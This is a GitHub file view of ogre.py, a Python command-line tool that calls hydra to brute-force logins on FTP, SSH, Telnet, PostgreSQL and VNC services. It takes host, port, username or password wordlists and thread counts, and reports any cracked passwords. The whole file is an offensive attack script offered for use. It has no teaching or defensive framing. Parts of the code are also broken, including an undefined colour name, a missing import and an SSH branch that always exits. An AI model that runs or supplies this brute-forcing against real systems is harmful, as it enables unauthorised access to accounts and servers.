-
Notifications
You must be signed in to change notification settings - Fork 1
/
ogre.py
executable file
·395 lines (377 loc) · 16.9 KB
/
ogre.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
#!/usr/bin/env python3
Blue, LBlue, Red, LRed, White, LWhite, Yellow, Magenta, Green, LGreen, Cyan, NC = '\033[1;94m', '\033[0;94m' ,'\033[1;91m', '\033[0;91m', '\033[1;97m', '\033[0;97m','\033[1;93m', '\033[1;95m', '\033[1;92m', '\033[0;92m', '\033[1;96m', '\033[0m'
import socket
import time
import concurrent.futures
import subprocess
import sys
import os
import os.path
from os import path
from subprocess import PIPE
usercheck = "u"
def inputHandler():
try:
print()
inputHeader= (str(input(Green + "[#] Enter your Choice: " + White)))
except KeyboardInterrupt:
print(Green + "\n" + "[~] Shutting down..." + NC)
raise SystemExit
except Exception as e:
print(RED + "\n" + "[!] Ogre crashed..." + "\n" + "[!] Debug info: " + "\n")
print(traceback.format_exc())
print("\n" + NC)
exit()
print()
#print(Magenta + "-------------------------------------" + NC)
if inputHeader == "1":
ftp()
elif inputHeader == "2":
ssh()
elif inputHeader == "3":
telnet()
elif inputHeader == "4":
postgresql()
elif inputHeader == "5":
vnc()
else:
print (Red + "[!] Wrong Choice: '" + Yellow + inputHeader + Red + "'")
inputHandler()
def ftp():
global usercheck
try:
host = input(Blue + "[#] Enter Host IP: " + White)
port = input(Blue + "[#] Enter Port(default is "+Cyan+"21"+Blue+"): ")
usercheck = input(Blue + "[#] Would you go with a userlist(U) or a single user name(u)? ["+Cyan+"U"+Blue+"/"+Cyan+"u"+Blue+"]: "+White)
if usercheck == "U":
username = input(Blue + "[#] Enter path to User wordlist: "+White)
elif usercheck == "u":
username = input(Blue + "[#] Enter Username to use: " + White)
wordlist = input(Blue + "[#] Enter path to Password wordlist(e.g. "+ Blue + "'" + Cyan + "wordlist/sshpass.txt" + Blue + "'): " + White)
threads = input(Blue + "[#] Enter the no. of Threads to use(default is " + Cyan +"16" + Blue + "): "+ White)
print("\n")
ftpConnect(host, port, username, wordlist, threads)
except KeyboardInterrupt:
print(Green + "\n" + "[~] Shutting down..." + NC)
raise SystemExit
except Exception as e:
print(RED + "\n" + "[!] Ogre crashed..." + "\n" + "[!] Debug info: " + "\n")
print(traceback.format_exc())
print("\n" + NC)
exit()
def ssh():
global usercheck
try:
host = input(Blue + "[#] Enter Host IP: " + White)
port = input(Blue + "[#] Enter Port(default is "+Cyan+"22"+Blue+"): ")
usercheck = input(Blue + "[#] Would you go with a userlist(U) or a single user name(u)? ["+Cyan+"U"+Blue+"/"+Cyan+"u"+Blue+"]: "+White)
if usercheck == "U":
username = input(Blue + "[#] Enter path to User wordlist: "+White)
elif usercheck == "u":
username = input(Blue + "[#] Enter Username to use: " + White)
wordlist = input(Blue + "[#] Enter path to Password wordlist(e.g. "+ Blue + "'" + Cyan + "wordlist/sshpass.txt" + Blue + "'): " + White)
threads = input(Blue + "[#] Enter the no. of Threads to use(default is "+Cyan+ "16"+Blue+"): "+ White)
#print(Magenta + "-------------------------------------" + NC)
print("\n")
sshConnect(host, port, username, wordlist, threads)
except KeyboardInterrupt:
print(Green + "\n" + "[~] Shutting down..." + NC)
raise SystemExit
except Exception as e:
print(RED + "\n" + "[!] Ogre crashed..." + "\n" + "[!] Debug info: " + "\n")
print(traceback.format_exc())
print("\n" + NC)
exit()
#with concurrent.futures.ThreadPoolExecutor() as executor:
# executor.submit(sshConnect, host, username, password)
def telnet():
global usercheck
try:
host = input(Blue + "[#] Enter Host IP: " + White)
port = input(Blue + "[#] Enter Port(default is "+Cyan+"23"+Blue+"): ")
usercheck = input(Blue + "[#] Would you go with a userlist(U) or a single user name(u)? ["+Cyan+"U"+Blue+"/"+Cyan+"u"+Blue+"]: "+White)
if usercheck == "U":
username = input(Blue + "[#] Enter path to User wordlist: "+White)
elif usercheck == "u":
username = input(Blue + "[#] Enter Username to use: " + White)
wordlist = input(Blue + "[#] Enter path to Password wordlist(e.g. "+ Blue + "'" + Cyan + "wordlist/sshpass.txt" + Blue + "'): " + White)
threads = input(Blue + "[#] Enter the no. of Threads to use(default is "+ Cyan +"16" + Blue +"): "+ White)
print("\n")
telnetConnect(host, port, username, wordlist, threads)
except KeyboardInterrupt:
print(Green + "\n" + "[~] Shutting down..." + NC)
raise SystemExit
except Exception as e:
print(RED + "\n" + "[!] Ogre crashed..." + "\n" + "[!] Debug info: " + "\n")
print(traceback.format_exc())
print("\n" + NC)
exit()
def postgresql():
global usercheck
try:
host = input(Blue + "[#] Enter Host IP: " + White)
port = input(Blue + "[#] Enter Port(default is "+Cyan+"5432"+Blue+"): ")
usercheck = input(Blue + "[#] Would you go with a userlist(U) or a single user name(u)? ["+Cyan+"U"+Blue+"/"+Cyan+"u"+Blue+"]: "+White)
if usercheck == "U":
username = input(Blue + "[#] Enter path to User wordlist: "+White)
elif usercheck == "u":
username = input(Blue + "[#] Enter Username to use: " + White)
wordlist = input(Blue + "[#] Enter path to Password wordlist(e.g. "+ Blue + "'" + Cyan + "wordlist/sshpass.txt" + Blue +"'): " +White)
threads = input(Blue + "[#] Enter the no. of Threads to use(default is "+ Cyan +"16"+ Blue +"): "+ White)
print("\n")
postgresqlConnect(host, port, username, wordlist, threads)
except KeyboardInterrupt:
print(Green + "\n" + "[~] Shutting down..." + NC)
raise SystemExit
except Exception as e:
print(RED + "\n" + "[!] Ogre crashed..." + "\n" + "[!] Debug info: " + "\n")
print(traceback.format_exc())
print("\n" + NC)
exit()
def vnc():
try:
host = input(Blue + "[#] Enter Host IP: " + White)
port = input(Blue + "[#] Enter Port(default is "+Cyan+"5900"+Blue+"): ")
wordlist = input(Blue + "[#] Enter path to Password wordlist(e.g. "+ Blue + "'" + Cyan + "wordlist/sshpass.txt" + Blue + "'): " + White)
threads = input(Blue + "[#] Enter the no. of Threads to use(default is "+Cyan+"16"+Blue+"): "+ White)
print("\n")
vncConnect(host, port, wordlist, threads)
except KeyboardInterrupt:
print(Green + "\n" + "[~] Shutting down..." + NC)
raise SystemExit
except Exception as e:
print(RED + "\n" + "[!] Ogre crashed..." + "\n" + "[!] Debug info: " + "\n")
print(traceback.format_exc())
print("\n" + NC)
exit()
def sshConnect(host, port, username, wordlist, threads):
try:
if host == "":
print(Red + "[!] Please provide a vaild Host")
print(Green + "[#] Exiting...")
raise SystemExit
if port == "":
port = "22"
if not path.exists(wordlist):
print(Red + "[!] Please provide a vaild Password Wordlist")
print(Green + "[#] Exiting...")
raise SystemExit
if usercheck == "U":
if not path.exists(username):
print(Red + "[!] Please provide a vaild User Wordlist")
print(Green + "[#] Exiting...")
raise SystemExit
print(Red + "[!] Please provide a vaild Wordlist")
print(Green + "[#] Exiting...")
raise SystemExit
if threads == "":
threads = "16"
flag = 0
print(Green + "[+] Bruteforcing ssh... " + LWhite
)
if usercheck == "U":
p1 = subprocess.Popen(['hydra', '-s', port,'-L', username, '-P', wordlist,
host, 'ssh', '-t', threads, '-I','-e','ns','-V'], stdout=PIPE,
stderr=PIPE)
else:
p1 = subprocess.Popen(['hydra', '-s', port, '-l', username, '-P', wordlist, host,
'ssh', '-t', threads, '-I', '-e', 'ns', '-V'], stdout=PIPE,
stderr=PIPE)
for line in iter(p1.stdout.readline, b''):
print(line.decode('utf-8').strip('\n'))
sys.stdout.flush()
time.sleep(0.0001)
if 'host' in line.decode('utf-8'):
print("\n" + LGreen + "[+] Cracked Password:" +
line.decode('utf-8') + LWhite)
flag = 1
if flag == 0:
print("\n" + Red + "[!] Password Not Found!" + NC)
except KeyboardInterrupt:
print(Green + "\n" + "[~] Shutting down..." + NC)
raise SystemExit
except Exception as exc:
print("[!] Error : %s " % exc)
def ftpConnect(host, port, username, wordlist, threads):
try:
if host == "":
print(Red + "[!] Please provide a vaild Host")
print(Green + "[#] Exiting...")
raise SystemExit
if port == "":
port = "21"
if not path.exists(wordlist):
print(Red + "[!] Please provide a vaild Password Wordlist")
print(Green + "[#] Exiting...")
raise SystemExit
if usercheck == "U":
if not path.exists(username):
print(Red + "[!] Please provide a vaild User Wordlist")
print(Green + "[#] Exiting...")
raise SystemExit
if threads == "":
threads = "16"
flag = 0
print(Green + "[+] Bruteforcing FTP..." + LWhite)
if usercheck == "U":
p1 = subprocess.Popen(['hydra', "-s", port,'-L', username, '-P', wordlist, host, 'ftp','-t', threads, '-I', '-e', 'ns', '-V'],
stdout=PIPE, stderr=PIPE)
else:
p1 = subprocess.Popen(['hydra', "-s", port, '-l', username, '-P', wordlist, host,
'ftp', '-t', threads, '-I', '-e', 'ns', '-V'], stdout=PIPE,
stderr=PIPE)
for line in iter(p1.stdout.readline, b''):
print(line.decode('utf-8').strip('\n'))
sys.stdout.flush()
time.sleep(0.0001)
if 'host' in line.decode('utf-8'):
print("\n" + LGreen + "[+] Cracked Password:" +
line.decode('utf-8') + LWhite)
flag = 1
if flag == 0:
print("\n" + Red + "[!] Password Not Found!" + NC)
except KeyboardInterrupt:
print(Green + "\n" + "[~] Shutting down..." + NC)
raise SystemExit
except Exception as exc:
print("[!] Error : %s " % exc)
def telnetConnect(host, port, username, wordlist, threads):
try:
if host == "":
print(Red + "[!] Please provide a vaild Host")
print(Green + "[#] Exiting...")
raise SystemExit
if port == "":
port = "23"
if not path.exists(wordlist):
print(Red + "[!] Please provide a vaild Password Wordlist")
print(Green + "[#] Exiting...")
raise SystemExit
if usercheck == "U":
if not path.exists(username):
print(Red + "[!] Please provide a vaild User Wordlist")
print(Green + "[#] Exiting...")
raise SystemExit
if threads == "":
threads = "16"
flag = 0
print(Green + "[+] Bruteforcing Telnet..." + LWhite)
if usercheck == "U":
p1 = subprocess.Popen(['hydra', '-s', port,'-L', username, '-P', wordlist, host, 'telnet','-t', threads, '-I', '-e', 'ns', '-V'],
stdout=PIPE, stderr=PIPE)
else:
p1 = subprocess.Popen(['hydra', '-s', port, '-l', username, '-P', wordlist, host,
'telnet', '-t', threads, '-I', '-e', 'ns', '-V'], stdout=PIPE,
stderr=PIPE)
for line in iter(p1.stdout.readline, b''):
print(line.decode('utf-8').strip('\n'))
sys.stdout.flush()
time.sleep(0.0001)
if 'host' in line.decode('utf-8'):
print("\n" + LGreen + "[+] Cracked Password:" +
line.decode('utf-8') + LWhite)
flag = 1
if flag == 0:
print("\n" + Red + "[!] Password Not Found!" + NC)
except KeyboardInterrupt:
print(Green + "\n" + "[~] Shutting down..." + NC)
raise SystemExit
except Exception as exc:
print("[!] Error : %s " % exc)
def postgresqlConnect(host, port, username, wordlist, threads):
try:
if host == "":
print(Red + "[!] Please provide a vaild Host")
print(Green + "[#] Exiting...")
raise SystemExit
if port == "":
port = "5432"
if not path.exists(wordlist):
print(Red + "[!] Please provide a vaild Password Wordlist")
print(Green + "[#] Exiting...")
raise SystemExit
if usercheck == "U":
if not path.exists(username):
print(Red + "[!] Please provide a vaild User Wordlist")
print(Green + "[#] Exiting...")
raise SystemExit
if threads == "":
threads = "16"
flag = 0
print(Green + "[+] Bruteforcing PostgreSQL..." + LWhite)
if usercheck == "U":
p1 = subprocess.Popen(['hydra', '-s', port, '-L', username, '-P', wordlist, host, 'postgres','-t', threads, '-I', '-e', 'ns', '-V'],
stdout=PIPE, stderr=PIPE)
else:
p1 = subprocess.Popen(['hydra', '-s', port,'-l', username, '-P', wordlist, host,
'postgres', '-t', threads, '-I', '-e', 'ns', '-V'], stdout=PIPE,
stderr=PIPE)
for line in iter(p1.stdout.readline, b''):
print(line.decode('utf-8').strip('\n'))
sys.stdout.flush()
time.sleep(0.0001)
if 'host' in line.decode('utf-8'):
print("\n" + LGreen + "[+] Cracked Password:" +
line.decode('utf-8') + LWhite)
flag = 1
if flag == 0:
print("\n" + Red + "[!] Password Not Found!" + NC)
except KeyboardInterrupt:
print(Green + "\n" + "[~] Shutting down..." + NC)
raise SystemExit
except Exception as exc:
print("[!] Error : %s " % exc)
def vncConnect(host, port, wordlist, threads):
try:
if host == "":
print(Red + "[!] Please provide a vaild Host")
print(Green + "[#] Exiting...")
raise SystemExit
if port == "":
port = "5900"
if not path.exists(wordlist):
print(Red + "[!] Please provide a vaild Wordlist")
print(Green + "[#] Exiting...")
raise SystemExit
if threads == "":
threads = "16"
flag = 0
print(Green + "[+] BruteForcing VNC..." + LWhite)
p1 = subprocess.Popen(['hydra', '-s' , port, '-P', wordlist, host,
'vnc', '-t', threads, '-V'], stdout=PIPE,
stderr=PIPE)
for line in iter(p1.stdout.readline, b''):
print(line.decode('utf-8').strip('\n'))
sys.stdout.flush()
time.sleep(0.0001)
if 'host' in line.decode('utf-8'):
print("\n" + LGreen + "[+] Cracked Password:" +
line.decode('utf-8') + LWhite)
flag = 1
if flag == 0:
print("\n" + Red + "[!] Password Not Found!" + NC)
except KeyboardInterrupt:
print(Green + "\n" + "[~] Shutting down..." + NC)
raise SystemExit
except Exception as exc:
print("[!] Error : %s " % exc)
os.system('clear||cls')
header = """
░█████╗░░██████╗░██████╗░███████╗
██╔══██╗██╔════╝░██╔══██╗██╔════╝
██║░░██║██║░░██╗░██████╔╝█████╗░░
██║░░██║██║░░╚██╗██╔══██╗██╔══╝░░ """+White+"""v0.1 by Yashvendra Kashyap a.k.a y_k_007"""+Green+"""
╚█████╔╝╚██████╔╝██║░░██║███████╗
░╚════╝░░╚═════╝░╚═╝░░╚═╝╚══════╝
"""
print(Green + "\t" + header + "\n\t" +Red+ " The Ultimate Bruteforcer" +
NC)
print()
print(Green + "[~] Available Services to Brute: ")
print()
print(Yellow + "[1] " + "FTP" + NC)
print(Yellow + "[2] " + "SSH" + NC)
print(Yellow + "[3] " + "Telnet" + NC)
print(Yellow + "[4] " + "Postgresql" + NC)
print(Yellow + "[5] " + "VNC" + NC)
inputHandler()